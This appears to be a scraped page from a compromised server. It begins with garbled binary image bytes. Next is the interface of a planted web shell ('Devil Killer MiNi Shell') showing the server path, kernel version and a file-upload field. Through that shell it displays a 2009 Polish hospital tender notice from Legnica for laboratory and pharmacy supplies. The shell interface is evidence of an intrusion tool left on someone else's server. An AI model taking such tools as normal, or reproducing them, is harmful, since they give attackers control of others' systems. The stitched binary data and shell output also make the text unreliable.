JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090310/55776-N-2009.html

<p class="kh_header"><b>Legnica: DOSTAWY DROBNEGO SPRZĘTU LABORATORYJNEGO I APTECZNEGO DLA WOJEWÓDZKIEGO SZPITALA SPECJALISTYCZNEGO 
W LEGNICY</b><br>
<b>Numer ogłoszenia: 55776 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny w Legnicy , ul. J. Iwaszkiewicza 5, 59-220 Legnica, woj. dolnośląskie, tel. (076) 721 11 26, faks (076) 721 11 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.legnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY DROBNEGO SPRZĘTU LABORATORYJNEGO I APTECZNEGO DLA WOJEWÓDZKIEGO SZPITALA SPECJALISTYCZNEGO 
W LEGNICY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy  drobnego sprzętu laboratoryjnego i aptecznego opisanych szczegółowo w załącznikach ofertowych nazwanych :
-  zadanie  nr 1 ( pakiety od 1 do 9 )
 - zadanie nr 2  ( pakiety od 1 do 18 ).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4, 38.43.70.00-7, 33.19.25.00-7, 33.60.00.00-6, 33.68.10.00-7, 33.19.80.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 49.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w at. 22 ust. 1 . pkt 1- 4 ustawy Prawo zamówień publicznych.
      
Ocena spełnienia w/w warunków, dokonana zostanie zgodnie z formułą spełnia / nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt X.A SIWZ. Z treści dokumentów musi jednoznacznie wynikać, iż w/w  warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A.
1.    Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).w przypadku składania oferty przez Wykonawców występujących wspólnie 	ww. Dokument musi złożyć każdy z wykonawców)
2.	Oświadczenie o spełnianiu warunków udziału w postępowaniu stanowiące załącznik Nr 1 do SIWZ.
B.
Inne dokumenty, które należy dołączyć do oferty

1)  Wypełniony druk oferty - stanowiący załącznik nr 3 do SIWZ 
2)Wypełnione i podpisane przez Wykonawcę  wybrane pakiety.
3) Elektroniczną wersje oferty w zakresie składanych pakietów.
Uwaga: Wszystkie dokumenty dołączone do oferty składane w formie kopii muszą być potwierdzone za zgodność z oryginałem przez osobę uprawnioną do składania oświadczeń woli. Jeżeli uprawnienie do złożenia oferty nie wynika z dokumentów wymienionych w pkt. X A ppkt.1 niniejszej SIWZ do oferty należy dołączyć stosowne pełnomocnictwo.
Wykonawcy ubiegający się wspólnie o udzielenie zamówienia( spółki cywilne, konsorcja) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Uwaga: w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty musi być załączone pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji Wykonawcy). Wykonawcy występujący wspólnie zobligowani są do złożenia dokumentów, o których mowa w części A pkt 1 dla każdego z Wykonawcy występujących z osobna.
W przypadku gdy Wykonawcy występujący wspólnie  nie ustanowią pełnomocnika oferta musi być podpisana przez każdego z Wykonawców  z osobna..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.legnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny w Legnicy 
ulica J. Iwaszkiewicza 5
59-220 Legnica, pokój 36 b.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2009 godzina 11:00, miejsce: Wojewódzki Szpital Specjalistyczny w Legnicy 
ulica J. Iwaszkiewicza 5
59-220 Legnica - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie nr 1 
 PAKIET 1- SMOCZKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SMOCZEK 	Szt. 	2100.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.68.10.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2 - BUTELKI I NAKRĘTKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Butelka do wykon.leku recepturowego i aptecznego 10 ml	szt	240
2	Butelka do wykon.leku recepturowego i aptecznego 20 ml	szt	600
3	Butelka do wykon.leku recepturowego i aptecznego 50 ml	szt	800
4	Butelka do wykon.leku recepturowego i aptecznego 100 ml	szt	600
5	Butelka do wykon.leku recepturowego i aptecznego 200 ml	szt	1 200
6	Butelka do wykon.leku recepturowego i aptecznego 250 ml	szt	1 200
7	Butelka do wykon.leku recepturowego i aptecznego 300 ml	szt	600
8	Butelka do wykon.leku recepturowego i aptecznego 500 ml	szt	1 200
9	Butelka do wykon.leku recepturowego i aptecznego 1000 ml	szt	1 000
10	Nakrętka ( 10, 20 )	szt	840
11	Nakrętka ( 100 )	szt	1200
12	Nakrętka ( 200 , 250 , 300 )	szt	3000
13	Nakrętka ( 500 , 1000 )	szt	2400
	Nakrętka kompatybilna z butelką j/w.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3 - ETYKIETY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Etykieta 3cm x 4cm pomarańczowa samoprzylepna zewnętrzna	op.	84
2	Etykieta 3cm x 4cm biała samoprzylepna wewnętrzna	op.	24
3	Etykieta 75mm x 50mm biała samoprzylepna wewn.	op.	12
4	Etykieta 75mm x 50mm pomarańczowa samoprzylepna zewn.	op.	36
5	Etykieta -krople oczne	op.	1
6	Etykieta -trucizna 30mm x 20mm	op.	1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4 - OPŁATKI SKROBIOWE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Opłatki skrobiowe nr 2	op.	24
2	Opłatki skrobiowe nr 3	op.	24
3	Opłatki skrobiowe  nr 4	op.	12
4	Opłatki skrobiowe nr 5	op.	12
5	Opłatki skrobiowe nr 6	op.	6.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET  5- PODKŁADKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Podkładka pergaminowa O40	op.	2
2	Podkładka pergaminowa O70	op.	12
3	Podkładka pergaminowa O100	op.	24
4	Podkładka pergaminowa O110	op.	24.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET 6 - PUDEŁKA APTECZNE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pudełka apteczne 10,0	szt	60
2	Pudełka apteczne 50,0	szt	60
3	Pudełka apteczne 100,0	szt	240
4	Pudełka apteczne 150,0	szt	360.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET 7 - SĄCZKI DO KROPLI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Sączek do kropli 0,22 mcm	szt	60.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET 8 - TORBY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Torba papierowa biała	Kg	8
2	Torba papierowa biała	Kg	18
3	Torba papierowa biała	Kg	18
4	Torba rec. pom. Nr 9	Kg	1.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET 9  - ZAKRAPLACZE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Zakraplacz na butelkę o znormalizowanej średnicy dla butelek o poj.10;20;50 ml	szt	600.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> ZADANIE NR 2
 PAKIET 1-BAGIETKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	BAGIETKA SZKLANA  FI 6 MM x 20 CM	szt	5
2	BAGIETKA SZKLANA FI 6 MM x 30CM	szt	17.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET 2 - BUTELKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	BUTELKA szklana wąska szyjka V-100 ML z korkiem, przeźroczyste	szt	5
2	BUTELKA szklana wąska szyjka V-250 ML z korkiem przeźroczyste	szt	25
3	BUTELKA  szklana wąska szyjka  V-500 ML z korkiem przeźroczyste	szt	5
4	BUTELKA  szklana wąska szyjka V-1000 ML z korkiem przeźroczyste	szt	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET 3 - CYLINDRY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	CYLINDER MIAROWY 50 ML KL.B Szklany	szt	3
2	CYLINDER MIAROWY 100 ML KL.B Szklany	szt	3
3	CYLINDER MIAROWY 250 ML KL.B Szklany	szt	5
4	CYLINDER MIAROWY 500 ML KL.B Szklany	szt	5
5	CYLINDER MIAROWY 1000 ML KL.B Szklany	szt	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PAKIET 4 - EZY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	EZA BAKTERIOLOGICZNA STERYLNA PLASTYKOWA V-1 UL	szt	12 000
2	EZA  BAKTERIOLOGICZNA STERYLNA, PLASTYKOWA 10 UL PP	szt	12 000
3	EZA BAKTERIOLOGICZNA Z DRUTU KANTALOWEGO POJ.1UL-KALIBROWANA	szt	50
4	EZA BAKTERIOLOGICZNA Z DRUTU KANTOLOWEGO POJ.10 UL-KALIBROWA	szt	50
5	EZY BAKTERIOLOGICZNE PLATYN.KALIBROWANE LR-151	szt	3
6	EZY BAKTERIOLOGICZNE PLATYN.KALIBROWANE LR-152	szt	3.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET 5- KOLBY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	KOLBA PŁASKODENNA W/SZ  V-100ML,szklana	szt	4
2	KOLBA PŁASKODENNA Z WĄSKĄ SZYJKĄ POJ. 1000 ML,szklana	szt	5
3	KOLBA STOŻKOWA ERLENMAYERA SZ/SZ V-250 ML WIELOWYMIAROWA,szklana	szt	4
4	KOLBA STOŻKOWA  ERLENMAYERA  W/SZ  V-500 ML WIELOWYMIAROWA,szklana	szt	4
5	KOLBA STOŻKOWA ERLANMAYERA W/SZ  V-1000ML WIELOWYMIAROWA,szklana	szt	4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PAKIET 6- KOŃCÓWKI EPPENDORF.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	KOŃCÓWKA EPPENDORF ŻÓŁTA 200 UL STER.  DO PIPET HTL	szt	5 000
2	KOŃCÓWKA ŻÓŁTA  200 UL EPPENDORF ( A 1000 SZT) NIESTER. DO PIPET HTL	op	26.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> PAKIET 7-LEJKI LABORATORYJNE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	LEJEK LABOR.SZKLANY FI 80 MM	szt	3
2	LEJEK LABORATORYJNY SZKLANY FI 100 MM	Szt.	4
3	LEJEK LABORATORYJNY SZKLANY FI 150 MM	szt	2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> PAKIET 8-MENZURKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Menzurka poj.500 m, szklana	szt	4
2	Menzurka poj.1000 ml, szklana	szt	4.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.00.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> PAKIET 9- PIPETY I KOŃCÓWKI DO PIPET.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	PIPETA  AUTOMATYCZNA ZMIENNOPOJEMNOŚCIOWA 10-100 UI, AUTOKLAWOWALNA BEZ KONIECZNOŚCI DEMONTAŻU	szt	1
2	PIPETA  AUTOMATYCZNA ZMIENNOPOJEMNOŚCIOWA 20-200 UI, AUTOKLAWOWALNA BEZ KONIECZNOŚCI DEMONTAŻU	szt	1
3	PIPETA PASTEURA 1 ML NIEJAŁOWA PLAST.-/ A 500 SZT/	op	39
4	PIPETA PASTEURA 3ML NIEJAŁOWA PLAST.(500SZT)	op	4
5	PIPETA PASTEURA 3 ML -STERYL.	szt	1 000
6	PIPETA PASTEURA 3 ML -STERYL. Z CIENKIM WYLOTEM DO PRECYZYJNYCH DOZOWAŃ 	szt	8 000
7	Pipeta wielomiar. 2 ML  Kl. B szklana	Szt.	10
8	Pipeta wielomiar. 5 ML  Kl .B, szklana	Szt.	10
9	Pipeta wielomiar. 10 ML  Kl. B, szklana	Szt.	10
*10	Pipeta automatyczna regulowana zakres 20-200 ul.	Szt.	1
*11	Pipeta automatyczna regulowana zakres 10-100 ul 	Szt.	1
*12	Automatyczna pipeta dozująca z końcówkami strzykawkowymi do krokowej, standardowej inokulacjitestów identyfikacyjnych oraz do pozostałych czynnosci dotyczących  dozowania w laboratorium mikrobiologicznym 	Szt.	1
13	Końcówki strzykawkowe do pipet 2,5 ml	szt	100
14	Końcówki strzykawkowe do pipet  5 ml	szt	100
			
			
	*Ad.poz.10 i poz. 11-wymagania: -automatyczny wyrzutnik końcówek;możliwość sterylizacji w autoklawie bez demontażu;odporne na działanie związków chemicznych;- możliwość dokładnego ustawienia wybranej objętości;-skok ustawienia 1 ul.                                                      *Ad. Poz. 12-wymagania:dozowanie w zakresie objętości 10-500ul;-objętość dozowania:10-50,25-125,50-250,100-500ul;-możliwość przeprowadzenia wymaganej ilości dozowań bez konieczności ponownego napełniania końcówki;-wszystkie końcówki powinny być dostępne wykonaniu sterylnym i niesterylnym; - możliwość sterylizacji metodą chemiczną w celu powtórnego stosowania,.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PAKIET 10 - PROBÓWKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	PROBÓWKA 10ML (PS) OKRĄGŁ.SKALOWANA BEZ KOŁNIERZA STERYLNA Z KORKIEM	szt	6 700
2	PROBÓWKA 5ML (PS) OKRĄGŁA  BEZ KOŁNIERZA  12X75MM PRZEŹROCZYSTA	szt	72 000
3	PROBÓWKA O POJ. 3 ML (12*55) (PS) NIESTERYLNA 	szt	4 200
4	PROBÓWKA O POJ. 3 ML (12*55) (PS) STERYLNA Z KORKIEM	szt	1 000
5	PROBÓWKI DO GŁĘBOKIEGO ZAMRAŻANIA poj 2 ml z samouszczelniającą nakrętką	szt	100
6	PROBÓWKI EPPENDORF  2 ML Z PODZIAŁKĄ ,SOCZEWKOWE	szt	3 000
7	Probówki o pojemności 4 ml, 12 x 75 mm,BEZ ZNACZNIKA Z KORKIEM ,STERYLNE	szt	500
8	Probówki o pojemności 5 ml, 12 x 92 mm, ze znacznikami  0,5-2,5-5,0 ml, z kołnierzem i korkiem, sterylne	szt	500
9	probówki szklane średnica 1.8 cm dł 10-11 cm	szt	1 000
10	PRÓBÓWKA  STOŻKOWA, WIROWKOWA, SZKLANA FI 16-17 X 105 MM	szt	12 050
11	PRÓBÓWKA STER. B/E V 10 ML/100 SZT/	szt	2 400
12	Probówki serologiczne z otwieraczem do drenów	szt	6 000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
